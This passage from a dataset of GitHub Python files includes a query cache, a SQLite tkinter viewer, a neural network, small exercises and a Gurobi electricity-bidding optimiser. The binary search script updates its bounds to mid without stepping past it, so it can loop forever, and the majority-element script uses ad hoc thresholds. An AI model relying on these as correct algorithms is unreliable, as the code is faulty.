TTLCache = TTLCache(\n maxsize = query_cache_config.query_cache_max_size_bytes,\n ttl = query_cache_config.query_cache_ttl_sec,\n )\n self.enable_query_cache: bool = query_cache_config.enable_query_cache\n\n def query_data_envelopes(\n self,\n query_dict: dict,\n ) -> list[dict]:\n \"\"\"\n This query is used for `ServerAction.RelayLineArgs` with\n final invocation for vararg-like multiple `data_envelope`-s (FS_18_64_57_18).\n Therefore, it is not latency-sensitive (results are not cached).\n\n See also `QueryResult.data_envelopes`.\n \"\"\"\n\n query_res = self.mongo_col.find(query_dict)\n return list(iter(query_res))\n\n def query_prop_values(\n self,\n query_dict: dict,\n search_control: SearchControl,\n assigned_types_to_values: dict[str, AssignedValue],\n ) -> QueryResult:\n \"\"\"\n Implements FS_39_58_01_91 query cache (if `enable_query_cache`).\n\n Returned `QueryResult` is used in for `ServerAction.ProposeArgValues` (Tab-completion)\n which makes it latency-sensitive (so the result is cached - see FS_39_58_01_91).\n\n Unlike `QueryEngine.query_data_envelopes` which returns all `data_envelopes` directly,\n `QueryEngine.query_prop_values` populates 0 to 1 envelope only (for performance reasons).\n\n See also `QueryResult.query_data_envelopes` and `QueryResult.data_envelopes`\n \"\"\"\n\n if self.enable_query_cache:\n ElapsedTime.measure(\"before_cache_lookup\")\n query_key = json.dumps(query_dict, separators = (\",\", \":\"))\n query_result = self.query_cache.get(query_key)\n ElapsedTime.measure(\"after_cache_lookup\")\n if query_result:\n return copy.deepcopy(query_result)\n\n query_result = self._query_prop_values(\n assigned_types_to_values,\n query_dict,\n search_control,\n )\n\n self.query_cache[query_key] = copy.deepcopy(query_result)\n else:\n query_result = self._query_prop_values(\n assigned_types_to_values,\n query_dict,\n search_control,\n )\n # No cache -> no deep copy (throw away result):\n return query_result\n\n def _query_prop_values(\n self,\n assigned_types_to_values,\n query_dict,\n search_control,\n ) -> QueryResult:\n\n ElapsedTime.measure(\"before_mongo_find\")\n mongo_result = self.mongo_col.find(query_dict)\n ElapsedTime.measure(\"after_mongo_find\")\n query_result = self._process_prop_values(\n mongo_result,\n search_control,\n assigned_types_to_values,\n )\n ElapsedTime.measure(\"after_process_results\")\n return query_result\n\n @staticmethod\n def _process_prop_values(\n mongo_result,\n search_control: SearchControl,\n assigned_types_to_values: dict[str, AssignedValue],\n ) -> QueryResult:\n \"\"\"\n Process `mongo_result` per types in `search_control` and populates `remaining_types_to_values`.\n\n It combines in one loop:\n * counting total `found_count` of `data_envelope`-s returned and\n * storing the last `data_envelope`.\n The last `data_envelope` is only useful when `found_count` is one (making it unambiguous `data_envelope`).\n To search all `data_envelope`, use `query_data_envelopes` function.\n\n Populates:\n * `found_count`\n * `remaining_types_to_values`\n \"\"\"\n\n remaining_types_to_values: dict[str, list[str]] = {}\n data_envelope = None\n data_envelopes = []\n found_count = 0\n\n # TODO: What if search result is huge? Blame data set designer?\n # find all remaining arg vals per arg type:\n for data_envelope in iter(mongo_result):\n found_count += 1\n # `arg_type` must be known:\n for arg_type in search_control.types_to_keys_dict:\n # `arg_type` must be in one of the `data_envelope`-s found:\n if arg_type in data_envelope:\n # If assigned/consumed, `arg_type` must not appear\n # as an option in `remaining_types_to_values` again:\n if arg_type not in assigned_types_to_values:\n arg_vals = scalar_to_list_values(data_envelope[arg_type])\n\n val_list = remaining_types_to_values.setdefault(arg_type, [])\n\n # Deduplicate: ensure unique `arg_value`-s:\n for arg_val in arg_vals:\n if arg_val not in val_list:\n val_list.append(arg_val)\n\n # Populate max one `data_envelope` on prop query for performance reasons:\n if data_envelope is not None:\n data_envelopes.append(data_envelope)\n\n return QueryResult(\n data_envelopes,\n found_count,\n remaining_types_to_values,\n )\n\n\ndef scalar_to_list_values(arg_type_val: list | str) -> list[str]:\n \"\"\"\n FS_06_99_43_60 providing scalar value for list/array field is also possible (and vice versa).\n \"\"\"\n if not isinstance(arg_type_val, list):\n return [arg_type_val]\n else:\n return arg_type_val\n\n\ndef populate_query_dict(envelope_container):\n query_dict = {\n ReservedArgType.EnvelopeClass.name: envelope_container.search_control.envelope_class,\n }\n # FS_31_70_49_15: populate arg values to search from the context:\n for arg_type in envelope_container.search_control.types_to_keys_dict:\n if arg_type in envelope_container.assigned_types_to_values:\n query_dict[arg_type] = envelope_container.assigned_types_to_values[arg_type].arg_value\n return query_dict\n","repo_name":"argrelay/argrelay","sub_path":"src/argrelay/relay_server/QueryEngine.py","file_name":"QueryEngine.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"}
+{"seq_id":"45605049858","text":"import sqlite3\nimport tkinter as tk \nfrom tkinter import * \n \ncon = sqlite3.connect('Form.db')\n\ndef sql_fetch(con):\n cursorObj = con.cursor()\n cursorObj.execute('SELECT * FROM StudentDetails')\n rows = cursorObj.fetchall()\n for row in rows:\n print(row, end=\"\\n\")\nsql_fetch(con)\n\nprint(end=\"\\n\\n\")\n\ndef sql_fetch(con):\n cursorObj = con.cursor()\n cursorObj.execute('SELECT name from sqlite_master where type= \"table\"')\n print(cursorObj.fetchall()) \nsql_fetch(con)\n\ncursorObj = con.cursor()\nprint(cursorObj.execute('SELECT * FROM StudentDetails').rowcount)\n\nprint(end=\"\\n\\n\")\n\nwin = tk.Tk()\nwin.geometry(\"815x250\")\nwin.configure(bg='black')\nwin.title(\"Database of Student Details\")\n\nlabel_0 = Label(win, text=\"Student Details Table\",bg='black', fg='white', width=20,font=(\"bold\", 30))\nlabel_0.place(x=200, y=70)\n\nprint(end=\"\\n\\n\")\n\nmy_connect = sqlite3.connect('Form.db')\nmy_conn = my_connect.cursor()\n\nmy_conn.execute(\"SELECT * FROM StudentDetails\")\ni=0 \nfor StudentDetails in my_conn: \n for j in range(len(StudentDetails)):\n e = Entry(win, width=10, bg='black', fg='white') \n e.grid(row=i, column=j) \n e.insert(END, StudentDetails[j])\n i=i+1\nwin.mainloop()\n","repo_name":"kanch91/Python-Project","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"2162077094","text":"import tensorflow as tf\n\nlayers = tf.keras.layers\n\n\nclass EvaluateNetwork(tf.keras.Model):\n def __init__(self):\n super().__init__()\n self.conv2d_1 = layers.Conv2D(filters=32, kernel_size=5,\n padding='same', activation='relu')\n\n self.pool2d_1 = layers.MaxPool2D(pool_size=2, strides=2)\n\n self.conv2d_2 = layers.Conv2D(filters=64, kernel_size=5,\n padding='same', activation='relu')\n\n self.pool2d_2 = layers.MaxPool2D(pool_size=2, strides=2)\n\n self.flatten = layers.Flatten()\n\n self.dense_1 = layers.Dense(units=1024, activation='relu')\n\n self.dropout = layers.Dropout(rate=0.5)\n\n self.dense_2 = layers.Dense(units=1)\n\n def call(self, inputs, training=False):\n x = self.conv2d_1(inputs)\n x = self.pool2d_1(x)\n x = self.conv2d_2(x)\n x = self.pool2d_2(x)\n x = self.flatten(x)\n x = self.dense_1(x)\n if training:\n x = self.dropout(x, training)\n return self.dense_2(x)\n\n\nif __name__ == \"__main__\":\n net = EvaluateNetwork()\n\n input_shape = (32, 32, 3)\n\n left_input = tf.keras.Input(shape=input_shape)\n right_input = tf.keras.Input(shape=input_shape)\n\n x = net(left_input)\n y = net(right_input)\n\n combined = tf.keras.Model(inputs=[left_input, right_input], outputs=[x, y])\n combined.summary()\n","repo_name":"purin52002/GenerateImageFromUserPreference","sub_path":"ranknet/model/evaluate_network.py","file_name":"evaluate_network.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"9177462525","text":"lst = list(map(int,input().split()))\nN = len(lst)\nhalf = N//2\nif(N==3 and half == 1): #for cases where length of the list is 3 and we have a value repeating twice\n half =2\n\nfor i in range(N):\n count = 0\n x = lst[i]\n for j in range(i,N):\n if(lst[j] == x):\n count +=1\n \n if(count>=half):\n print(lst[i])\n \n\n\n","repo_name":"tg270798/daily-coding-problem","sub_path":"problem_155.py","file_name":"problem_155.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"26875615602","text":"\n\nfrom turtle import pos\n\n\ndef search(list,n):\n l = 0 #l mean lower bound and it is first index of the list\n u = len(list)-1 #u mean upper bound and it is last index value of list\n while l <= u :\n mid = (l+u)//2 # \"//\" give output to int\n if list[mid] == n:\n globals() ['pos'] = mid \n return True\n else:\n if list[mid] < n:\n l = mid\n else:\n u = mid\n\nlist = [4,7,8,12,45,99]\nn = 45\nif search( list,n ):\n print(\"found at \",pos+1)\nelse:\n print(\"not found\")\n","repo_name":"aungkyaw718/alogrithm","sub_path":"BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"40950002089","text":"from dato import Dato\n\ndef hovedprogram():\n \"\"\"Hovedprogrammet sjekker at klassen Dato fungerer som den skal\"\"\"\n\n # Oppretter et Dato objekt\n min_bursdag = Dato(31, 12, 2004)\n\n # Printer ut året\n print(min_bursdag.hent_aar())\n\n # Lagrer datoen i en variabel og deler den i en liste\n dato = min_bursdag.hent_dato()\n dato_sortert = dato.split(\".\")\n\n # Sjekker om dagen er den 15. i måneden\n if dato_sortert[0] == \"15\":\n print(\"Loenningsdag!\")\n # Sjekker om dagen er den 1. i måneden\n elif dato_sortert[0] == \"1\":\n print(\"Ny maaned, nye muligheter\")\n \n # Printer ut datoen\n print(dato)\n \n # Sjekker om datoen er den 31.\n if min_bursdag.sjekk_dag(31):\n print(\"Dagen stemmer\")\n else:\n print(\"Dagen stemmer ikke\")\n \n # Kaller på neste_dag() metoden for å endre datoen til neste dag\n min_bursdag.neste_dag()\n # Printer ut den nye datoen\n print(min_bursdag.hent_dato())\n\n # Lagrer True hvis datoen oppgitt er etter datoen fra konstruktøren, og False hvis den er før\n dato_for_etter = min_bursdag.for_eller_etter(\"1.1.2004\")\n \n if dato_for_etter == 0:\n print(\"Datoene er like\")\n elif dato_for_etter == 1:\n print(\"Datoen er før\")\n else:\n print(\"Datoen er etter\")\n\n# Kaller på hovedprogrammet\nhovedprogram()","repo_name":"Sondremi/IN1000-obliger-H23","sub_path":"Oblig6/test_dato.py","file_name":"test_dato.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"9185301177","text":"# -*- coding: UTF-8 -*-\n\nimport math\nimport os\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport gurobipy as gp\nfrom gurobipy import GRB\n\nclass Planner():\n \"\"\"\n MILP Electricity dad bidding formulation.\n \"\"\"\n\n def __init__(self, scenarios:dict, prices:dict, x:np.array=None, curtail:bool=True, soc_max:float=1):\n \"\"\"\n Init the planner.\n \"\"\"\n\n self.pv_scenarios = scenarios['PV'] # (MW) (n_s, n_periods)\n self.wind_scenarios = scenarios['W'] # (MW) (n_s, n_periods)\n self.load_scenarios = scenarios['L'] # (MW) (n_s, n_periods)\n self.nb_scenarios = self.pv_scenarios.shape[0]\n self.s_set = range(self.nb_scenarios)\n self.x = x # (MW)\n self.curtail = curtail\n\n self.period_hours = 1 # (hour)\n self.nb_periods = self.pv_scenarios.shape[1]\n self.t_set = range(self.nb_periods)\n\n self.dad_prices = prices['dad'] # (euros/MWh) (n_periods,)\n self.imb_pos_prices = prices['imb +'] # (euros/MWh) (n_periods,)\n self.imb_neg_prices = prices['imb -'] # (euros/MWh) (n_periods,)\n\n # BESS parameters\n self.soc_max = soc_max\n self.charge_power = self.soc_max / 2\n self.discharge_power = self.soc_max / 2\n self.soc_min = 0\n self.charge_eff = 0.95\n self.discharge_eff = 0.95\n self.soc_ini = 0\n self.soc_end = 0\n\n self.time_building_model = None\n self.time_solving_model = None\n\n # Create model\n self.model = self.create_model()\n\n # Solve model\n self.solver_status = None\n\n def create_model(self):\n \"\"\"\n Create the optimization problem.\n \"\"\"\n t_build = time.time()\n\n # -------------------------------------------------------------------------------------------------------------\n # 1. create model\n model = gp.Model(\"planner_dad\")\n\n # -------------------------------------------------------------------------------------------------------------\n # 2. create variables\n # 2.1 First-stage variables -> x = dad bidding\n x = model.addVars(self.nb_periods, lb=-1000, ub=1000, obj=0, vtype=GRB.CONTINUOUS, name=\"x\") # Retailer position (injection > 0, withdrawal < 0) (MWh)\n if self.x is not None:\n for t in self.t_set:\n x[t].setAttr(\"ub\", self.x[t])\n x[t].setAttr(\"lb\", self.x[t])\n\n # 2.2 Second-stage variables -> y = realisation of the random variables in scenarios omega\n y = model.addVars(self.nb_scenarios, self.nb_periods, lb=-1000, ub=1000, obj=0, vtype=GRB.CONTINUOUS, name=\"y\") # Retailer position in scenario s (injection > 0, withdrawal < 0) (MWh)\n y_short = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_short\") # Retailer position in short in scenario s y_short >= (x - y) (MWh)\n y_long = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_long\") # Retailer position in long in scenario s y_long >= (y - x) (MWh)\n\n y_PV = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_PV\") # PV generation in scenario s (MW)\n y_W = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_W\") # Wind generation in scenario s (MW)\n y_L = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_L\") # Load generation in scenario s (MW)\n\n y_s = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_s\") # BESS state of charge in scenario s (MWh)\n y_cha = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_cha\") # BESS charging power in scenario s (MW)\n y_dis = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_dis\") # BESS discharging power in scenario s (MW)\n y_b = model.addVars(self.nb_scenarios, self.nb_periods, obj=0, vtype=GRB.BINARY, name=\"y_b\") # BESS binary variable to prevent from charging or discharging simultaneously in scenario s (-)\n\n # -------------------------------------------------------------------------------------------------------------\n # 3. Objective: maximize the IJF_paper profit\n # -------------------------------------------------------------------------------------------------------------\n # Maximization of the expected profit over all scenarios s with an equal probability\n # -> the dad prices are assumed to be equal to the expected value for a given time periocd t: dad_prices_t = E[dad_prices_{t,s}]\n # -> the pos imb prices are assumed to be equal to the expected value: imb_pos_prices_t = E[imb_pos_prices_{t,s}]\n # -> the neg imb prices are assumed to be equal to the expected value: imb_neg_prices_t = E[imb_neg_prices_{t,s}]\n\n # max sum_t [sum_s alpha_s {self.dad_prices[t] * y[s,t] -(self.imb_neg_prices[t] * y_short[s,t] + self.imb_pos_prices[t] * y_long[s,t]) }]\n\n dad_profit = gp.quicksum(self.dad_prices[t] * x[t] for t in self.t_set)\n short_penalty = gp.quicksum(gp.quicksum(self.imb_neg_prices[t] * y_short[s,t] for s in self.s_set)/self.nb_scenarios for t in self.t_set)\n long_penalty = gp.quicksum(gp.quicksum(self.imb_pos_prices[t] * y_long[s,t] for s in self.s_set)/self.nb_scenarios for t in self.t_set)\n\n model.setObjective(dad_profit - (short_penalty + long_penalty), GRB.MAXIMIZE)\n\n # -------------------------------------------------------------------------------------------------------------\n # 4. create constraints\n\n # Second-stage constraints\n # Energy balance equation\n model.addConstrs((y[s,t] - self.period_hours * (y_PV[s,t] + y_W[s,t] + y_dis[s,t] - y_cha[s,t]) + y_L[s,t] == 0 for s in self.s_set for t in self.t_set), name='c_balance')\n\n # Short position cst\n model.addConstrs((y_short[s,t] >= (x[t] - y[s,t]) for s in self.s_set for t in self.t_set), name='c_short')\n # Long position cst\n model.addConstrs((y_long[s,t] >= (y[s,t] - x[t]) for s in self.s_set for t in self.t_set), name='c_long')\n\n # Generation & load cst\n if self.curtail:\n model.addConstrs((y_PV[s,t] <= self.pv_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_PV')\n model.addConstrs((y_W[s,t] <= self.wind_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_W')\n else:\n model.addConstrs((y_PV[s,t] == self.pv_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_PV')\n model.addConstrs((y_W[s,t] == self.wind_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_W')\n model.addConstrs((y_L[s,t] == self.load_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_L')\n\n # BESS constraints\n # max charge cst\n model.addConstrs((y_cha[s,t] <= y_b[s,t] * self.charge_power for s in self.s_set for t in self.t_set), name='c_max_charge')\n # max discharge cst\n model.addConstrs((y_dis[s,t] <= (1 - y_b[s,t]) * self.discharge_power for s in self.s_set for t in self.t_set), name='c_max_discharge')\n # min soc cst\n model.addConstrs((y_s[s,t] >= self.soc_min for s in self.s_set for t in self.t_set), name='c_min_s')\n # min soc cst\n model.addConstrs((y_s[s,t] <= self.soc_max for s in self.s_set for t in self.t_set), name='c_max_s')\n\n # BESS dynamics first period\n model.addConstrs((y_s[s,0] - self.period_hours * (self.charge_eff * y_cha[s,0] - y_dis[s,0] / self.discharge_eff) == self.soc_ini for s in self.s_set), name='c_BESS_first_period')\n # BESS dynamics from second to last periods\n model.addConstrs((y_s[s,t] - y_s[s,t-1]- self.period_hours * (self.charge_eff * y_cha[s,t] - y_dis[s,t] / self.discharge_eff) == 0 for s in self.s_set for t in range(1, self.nb_periods)), name='c_BESS_dynamics')\n # BESS dynamics last period\n model.addConstrs((y_s[s, self.nb_periods-1] == self.soc_end for s in self.s_set), name='c_BESS_last_period')\n\n # -------------------------------------------------------------------------------------------------------------\n # 5. Store variables\n self.allvar = dict()\n self.allvar['x'] = x\n self.allvar['y'] = y\n self.allvar['y_short'] = y_short\n self.allvar['y_long'] = y_long\n self.allvar['y_PV'] = y_PV\n self.allvar['y_W'] = y_W\n self.allvar['y_L'] = y_L\n self.allvar['y_cha'] = y_cha\n self.allvar['y_dis'] = y_dis\n self.allvar['y_s'] = y_s\n self.allvar['y_b'] = y_b\n\n self.time_building_model = time.time() - t_build\n # print(\"Time spent building the mathematical program: %gs\" % self.time_building_model)\n\n return model\n\n def solve(self, LogToConsole:bool=False, logfile:str=\"\", Threads:int=0, MIPFocus:int=0, TimeLimit:float=GRB.INFINITY):\n\n t_solve = time.time()\n\n self.model.setParam('LogToConsole', LogToConsole) # no log in the console if set to False\n # self.model.setParam('OutputFlag', outputflag) # no log into console and log file if set to True\n # self.model.setParam('MIPGap', 0.01)\n self.model.setParam('TimeLimit', TimeLimit)\n self.model.setParam('MIPFocus', MIPFocus)\n # self.model.setParam('DualReductions', 0) # Model was proven to be either infeasible or unbounded. To obtain a more definitive conclusion, set the DualReductions parameter to 0 and reoptimize.\n\n # If you are more interested in good quality feasible solutions, you can select MIPFocus=1.\n # If you believe the solver is having no trouble finding the optimal solution, and wish to focus more attention on proving optimality, select MIPFocus=2.\n # If the best objective bound is moving very slowly (or not at all), you may want to try MIPFocus=3 to focus on the bound.\n\n self.model.setParam('LogFile', logfile) # no log in file if set to \"\"\n self.model.setParam('Threads', Threads) # Default value = 0 -> use all threads\n\n self.model.optimize()\n self.solver_status = self.model.status\n self.time_solving_model = time.time() - t_solve\n\n def store_solution(self):\n\n m = self.model\n\n solution = dict()\n solution['status'] = m.status\n if solution['status'] == 2 or solution['status'] == 9:\n solution['obj'] = m.objVal\n\n # 1 dimensional variables\n for var in ['x']:\n solution[var] = [self.allvar[var][t].X for t in self.t_set]\n\n # 2 dimensional variables\n for var in ['y', 'y_short', 'y_long', 'y_PV', 'y_W', 'y_L', 'y_dis', 'y_cha', 'y_s', 'y_b']:\n solution[var] = [[self.allvar[var][s, t].X for t in self.t_set] for s in self.s_set]\n\n solution['dad_profit'] = sum([solution['x'][t] * self.dad_prices[t] for t in self.t_set])\n solution['short_penalty'] = sum([sum([solution['y_short'][s][t] * self.imb_neg_prices[t] for t in self.t_set]) for s in self.s_set]) / self.nb_scenarios\n solution['long_penalty'] = sum([sum([solution['y_long'][s][t] * self.imb_pos_prices[t] for t in self.t_set]) for s in self.s_set]) / self.nb_scenarios\n solution['obj2'] = solution['dad_profit'] - (solution['short_penalty'] + solution['long_penalty'])\n else:\n print('WARNING model is not OPTIMAL')\n solution['obj'] = math.nan\n\n # 3. Timing indicators\n solution[\"time_building\"] = self.time_building_model\n solution[\"time_solving\"] = self.time_solving_model\n solution[\"time_total\"] = self.time_building_model + self.time_solving_model\n\n return solution\n\n def export_model(self, filename):\n \"\"\"\n Export the pyomo model into a cpxlp format.\n :param filename: directory and filename of the exported model.\n \"\"\"\n\n self.model.write(\"%s.lp\" % filename)\n # self.model.write(\"%s.mps\" % filename)\n\n\nif __name__ == \"__main__\":\n # Set the working directory to the root of the project\n print(os.getcwd())\n\n dir_path = '../../../elia_case_study/bidding/export/dad_bidding/'\n if not os.path.isdir(dir_path): # test if directory exist\n os.makedirs(dir_path)\n\n soc_max = 500\n\n q_pos = 2\n q_neg = 2\n\n dad_price = 100 # euros /MWh\n # pos_imb = neg_imb = q * dad_price # euros /MWh\n pos_imb = q_pos * dad_price # euros /MWh\n neg_imb = q_neg * dad_price # euros /MWh\n gamma = (dad_price + pos_imb) / (pos_imb + neg_imb)\n print('dad_price %s pos_imb %s neg_imb %s GAMMA %s' % (dad_price, pos_imb, neg_imb, gamma))\n\n # load data\n df_gen = pd.read_csv('../../../elia_case_study/data/generation.csv', parse_dates=True, index_col=0)\n df_load = pd.read_csv('../../../elia_case_study/data/load.csv', parse_dates=True, index_col=0)\n df_dad = pd.read_csv('../../../elia_case_study/data/dad.csv', parse_dates=True, index_col=0)\n df_imb = pd.read_csv('../../../elia_case_study/data/imb.csv', parse_dates=True, index_col=0)\n\n nb_scenarios = 5\n pv = df_gen['PV true']['2020-1-1':'2020-1-'+str(nb_scenarios)]\n wind = df_gen['W on true']['2020-1-1':'2020-1-' + str(nb_scenarios)]\n load = 0.05 * df_load['load true']['2020-1-1':'2020-1-' + str(nb_scenarios)]\n\n # 20 scenarios\n scenarios = dict()\n scenarios['PV'] = pv.values.reshape(nb_scenarios,24)\n scenarios['W'] = wind.values.reshape(nb_scenarios, 24)\n scenarios['L'] = load.values.reshape(nb_scenarios, 24)\n\n # Plot point forecasts vs observations\n FONTSIZE = 10\n plt.figure()\n net = pv.values + wind.values - load.values\n plt.plot(pv.values, label='PV')\n plt.plot(wind.values, label='W on')\n plt.plot(load.values, label='Load')\n plt.plot(net, 'r', label='net')\n plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n prices = dict()\n prices['dad'] = np.asarray([dad_price]*16+[3*dad_price]*4+[dad_price]*4)\n prices['imb +'] = np.asarray([pos_imb]*16+[3*pos_imb]*4+[pos_imb]*4)\n prices['imb -'] = np.asarray([neg_imb]*16+[3*neg_imb]*4+[neg_imb]*4)\n\n # prices = dict()\n # prices['dad'] = df_dad['2020-1-3'].values.reshape(-1)\n # prices['imb +'] = q_pos * df_dad['2020-1-3'].values.reshape(-1)\n # prices['imb -'] = q_neg * df_dad['2020-1-3'].values.reshape(-1)\n\n plt.figure()\n plt.plot(prices['dad'], label='dad')\n plt.plot(prices['imb -'] , label='imb neg')\n plt.ylabel('€/MWh', fontsize=FONTSIZE, rotation='horizontal')\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n # Dad planner\n planner = Planner(scenarios=scenarios, prices=prices, soc_max=soc_max)\n planner.export_model(dir_path + 'planner_dad')\n planner.solve()\n sol_planner = planner.store_solution()\n #\n print('profit %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (sol_planner['obj'] / 1000, sol_planner['dad_profit'] / 1000, sol_planner['short_penalty'] / 1000, sol_planner['long_penalty'] / 1000))\n\n plt.figure()\n plt.plot(sol_planner['x'], 'r', label='planning')\n for s in range(nb_scenarios):\n # plt.plot(solution['y'][0], 'k',label='position')\n net = scenarios['PV'][s] + scenarios['W'][s] - scenarios['L'][s]\n # plt.plot(scenarios['PV'][s] + scenarios['W'][s], 'gray')\n # plt.plot(scenarios['L'][s], 'b')\n # plt.plot(solution['y_s'][0], 'orange',label='y_s')\n plt.plot(net, 'g', label='net=generation-load')\n plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n plt.ylim(-1000,2000)\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n # Economic dispatch based on actual realization of uncertainties\n np.random.seed(seed=0)\n # omega = np.random.randint(nb_scenarios, size=nb_scenarios)\n omega = range(nb_scenarios)\n res_O = []\n res_planner = []\n for s in omega:\n # pick a scenario\n scenarios_dispatch = dict()\n scenarios_dispatch['PV'] = scenarios['PV'][s,:].reshape(1, 24)\n scenarios_dispatch['W'] = scenarios['W'][s,:].reshape(1, 24)\n scenarios_dispatch['L'] = scenarios['L'][s,:].reshape(1, 24)\n\n # oracle\n oracle = Planner(scenarios=scenarios_dispatch, prices=prices, soc_max=soc_max)\n oracle.export_model(dir_path + 'planner_dad')\n oracle.solve()\n sol_oracle = oracle.store_solution()\n\n res_O.append(sol_oracle['obj'] / 1000)\n\n dispatch = Planner(scenarios=scenarios_dispatch, prices=prices, x=sol_planner['x'], soc_max=soc_max)\n dispatch.export_model(dir_path + 'dispatch')\n dispatch.solve()\n sol_dispatch = dispatch.store_solution()\n res_planner.append(sol_dispatch['obj'] / 1000)\n\n print('s %s net %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (s, sol_dispatch['obj'] / 1000, sol_dispatch['dad_profit'] / 1000, sol_dispatch['short_penalty'] / 1000, sol_dispatch['long_penalty'] / 1000))\n print('oracle net %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (sol_oracle['obj'] / 1000, sol_oracle['dad_profit'] / 1000, sol_oracle['short_penalty'] / 1000, sol_oracle['long_penalty'] / 1000))\n net = scenarios_dispatch['PV'][0] + scenarios_dispatch['W'][0] - scenarios_dispatch['L'][0]\n\n # plt.figure()\n # plt.plot(sol_oracle['x'], 'b', label='x oracle')\n # plt.plot(sol_planner['x'], 'r', label='planning')\n # plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n # plt.ylim(-1000,2000)\n # plt.title(str(s) + ' oracle vs planner')\n # plt.xticks(fontsize=FONTSIZE)\n # plt.yticks(fontsize=FONTSIZE)\n # plt.legend(fontsize=FONTSIZE)\n # plt.tight_layout()\n # plt.show()\n #\n # plt.figure()\n # plt.plot(sol_planner['x'], 'r', label='planning')\n # plt.plot(sol_dispatch['y'][0], 'k',label='position')\n # plt.plot(sol_dispatch['y_s'][0], 'orange',label='y_s')\n # # plt.plot(scenarios_dispatch['PV'][0] + scenarios_dispatch['W'][0], 'gray', label='generation')\n # # plt.plot(scenarios_dispatch['L'][0], 'b', label='load')\n # plt.plot(net, 'g', label='net=generation-load')\n # plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n # plt.ylim(-1000,2000)\n # plt.title(s)\n # plt.xticks(fontsize=FONTSIZE)\n # plt.yticks(fontsize=FONTSIZE)\n # plt.legend(fontsize=FONTSIZE)\n # plt.tight_layout()\n # plt.show()\n\n plt.figure()\n plt.plot(res_O, 'r', label='oracle')\n plt.plot(res_planner, 'k', label='planner')\n plt.ylabel('k€', fontsize=FONTSIZE, rotation='horizontal')\n plt.xlabel('scenarios', fontsize=FONTSIZE, rotation='horizontal')\n plt.ylim(-1000, 1200)\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n print('O %.2f planner %.2f' %(sum(res_O), sum(res_planner)))","repo_name":"jonathandumas/generative-models","sub_path":"GEFcom2014/forecast_value/dad_planner.py","file_name":"dad_planner.py","file_ext":"py","file_size_in_byte":19605,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"19"}
